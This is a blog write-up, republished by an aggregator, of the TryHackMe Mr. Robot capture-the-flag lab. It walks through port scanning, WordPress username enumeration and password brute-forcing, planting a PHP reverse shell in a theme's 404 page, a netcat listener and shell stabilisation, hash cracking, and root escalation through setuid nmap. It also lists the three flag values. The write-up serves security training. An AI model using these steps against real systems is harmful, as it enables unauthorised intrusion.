TryHackMe – Mr. Robot Capture The Flag (CTF) Challenge : Benjamin Reitz
by: Benjamin Reitz
blow post content copied from Finxter
click here to view original post
Have you seen the hacker-themed TV show Mr. Robot?
This article is a write-up of the walkthrough video for the CTF (Capture The Flag) style hacking challenge, Mr. Robot, on TryHackMe.
The challenge involves using standard pen-testing tools like nmap for enumeration and gobuster for brute-force directory sniffing. We will also make use of exploiting a certain bin command’s capability to run as root in order to carry out an attack to retrieve the last flag.
First, we connect to the VPN with OpenVPN, start up our target machine, and then note down our IPs.
export myIP=10.6.2.23 export targetIP=10.10.58.206
Enumeration
Let’s start scanning the target machine with nmap.
sudo nmap -Pn -sC -p- -O $targetIP
-Pnskips host discovery-sCruns default script-p-scans all ports-Oenables OS detection
Here’s the output:
┌──(tester㉿box)-[~]
└─$ sudo nmap -Pn -sC -p- -O $targetIP
[sudo] password for tester:
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-01 12:16 EST
Stats: 0:00:19 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 7.58% done; ETC: 12:20 (0:03:52 remaining)
Stats: 0:13:21 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 90.25% done; ETC: 12:30 (0:01:27 remaining)
Stats: 0:13:43 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 91.88% done; ETC: 12:30 (0:01:13 remaining)
Nmap scan report for 10.10.15.66
Host is up (0.081s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
|_http-title: Site doesn't have a title (text/html).
443/tcp open https
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
|_http-title: Site doesn't have a title (text/html).
Device type: general purpose|specialized|storage-misc|WAP|broadband router|printer
Running (JUST GUESSING): Linux 3.X|5.X|4.X|2.6.X (91%), Crestron 2-Series (89%), HP embedded (89%), Asus embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:5.4 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6.22 cpe:/o:linux:linux_kernel:2.6 cpe:/h:asus:rt-n56u
Aggressive OS guesses: Linux 3.10 - 3.13 (91%), Linux 5.4 (91%), Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 3.2 - 3.5 (90%), Linux 3.2 - 3.8 (90%), Linux 4.2 (90%), Linux 4.4 (90%)
No exact OS matches for host (test conditions non-ideal).
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 942.40 seconds
For further enumeration, let’s grab SecLists (a set of standard scanning wordlists), seclists from the git repo at: https://github.com/danielmiessler/SecLists.git. Next, we’ll run gobuster using big.txt as our wordlist from SecLists:
sudo gobuster dir -w /home/tester/hacking-tools/SecLists/Discovery/Web-Content/big.txt -u http://10.10.15.66
-wfor wordlist-ufor url
The most interesting pages that jump out at me are the robots.txt and the /wp-admin. Let’s look at both of them to see what additional hints we can find.
We discover (no surprise!) a login page to WordPress at $targetIP/wp-login.php
Looking at $targetIP/robots.txt we find:
User-agent: *
fsocity.dic
Key-1-of-3.txtLocating The First Key
If we navigate in our browser to $targetIP/fsocity.dic we download a dictionary file fsocity.dic. Browsing through the dictionary, we notice that it appears to be a password wordlist.
$targetIP/key-1-of-3.txt reveals our first of three keys:
073403c8a58a1f80d943455fb30724b9
Determining The Username
Now that we have a login page to WordPress, a password wordlist (fsociety.dic), all we need is a login username, and we will be ready to use gobuster to brute-force our way into the admin dashboard.
After inspecting the login page, we guess a few names from the Mr. Robot show: Elliot, Mr. Robot, Tyrell.
The errors from the login page reveal that Elliot is a valid username, but Mr. Robot and Tyrell are not. To test this out, we can also try misspelling Elliott (with two t’s) with a random password to see that the error returned says: invalid username.
Brute-Forcing The Password To WordPress Admin Dashboard
For this next attack we will use a specialized wordpress scanning tool:
wpscan – url 10.10.58.206 -P /home/tester/Downloads/fsocity.dic – usernames elliot
-Pfor password list
The scan successfully found Elliot’s password!
successfully found Elliot's password: ER28-0652Uploading a Malicious Payload
After logging in to WordPress at $targetIP/wp-login.php we find a dashboard. Clicking on the left sidebar on Appearance/editor shows us a list of pages we can modify.
Let’s modify the 404.php error page to upload a malicious payload.
Spawning a Reverse Shell From WordPress
For our malicious payload, we will use pentest monkey’s PHP revshell from GitHub.
The only thing we need to modify on the payload is our attack machine’s IP and listening port. After updating the payload, we can save it in the 404.php page.
Now to spawn a shell to a listener, all we need to do is load up the $targetIP/404.php page from our browser.
Let’s set up a listener with netcat:
sudo nc -lvnp 53
-lvnp
l= listen mode, for inbound connectsv= verbosen= suppress name/port resolutionsp= port
We used port 53 for our listener port in this example.
Success! We just caught the reverse shell with netcat. It is an unstable shell, so we can do a few things to stabilize it. We can start by spawning a proper shell with Python.
python -c 'import pty;pty.spawn("/bin/bash");’
After backgrounding the shell with Ctrl+Z we enter the command:
stty raw -echo; fg
This command mirrors our terminal settings from the local machine to the netcat listener shell. It will also give us abilities such as tab completion and up for most recent commands.
The fg at the end of this command foregrounds the nc listener.
And now, when we load the 404.php webpage, we successfully catch the revshell!
Decrypting User Robot’s Password
Navigate to /home/robot
cat password.raw-md5
Output:
robot:c3fcd3d76192e4007dfb496cca67e13bFound it! Now, all we need to do is to look this hash up on a website that hosts dictionaries of cracked hashes or crack it on our attack machine with a program like hashcat.
Using crackstation we can find the cleartext of our password!
abcdefghijklmnopqrstuvwxyzFinding The Second Key
After switching over to user robot with our cracked password, we do a bit of enumeration and easily find the key.
su robot cat key-2-of-3.txt 822c73956184f694993bede3eb39f959
Privilege Escalation to Root
With the following command, we search for files in /bin/ that have the setuid bit set.
In other words, these types of files can run as root from a non-root account. GTFObins has a comprehensive list of leveraging certain binaries’ abilities to carry out privilege escalation.
For this box, we will find out that there are several options with the command:
find / -perm +6000 2>/dev/null | grep '/bin/'
We will move forward with Nmap. It has the ability to go into an interactive mode where it can send and receive commands as the root user.
We launch nmap in interactive mode with the command:
nmap – interactive
Then adding the prefix ! allows us to issue sudo commands. After locating the file for key 3, we can cat it out using ; to chain commands together.
nmap> !cd /root;cat key-3-of-3.txt 04787ddef27c3dee1ee161b21670b4e4
And now we have retrieved all 3 of Mr. Robot’s keys.
December 05, 2022 at 05:39PM
Click here for more details...
=============================
The original post is available in Finxter by Benjamin Reitz
this post has been published as it is through automation. Automation script brings all the top bloggers post under a single umbrella.
The purpose of this blog, Follow the top Salesforce bloggers and collect all blogs in a single place through automation.
============================
Post a Comment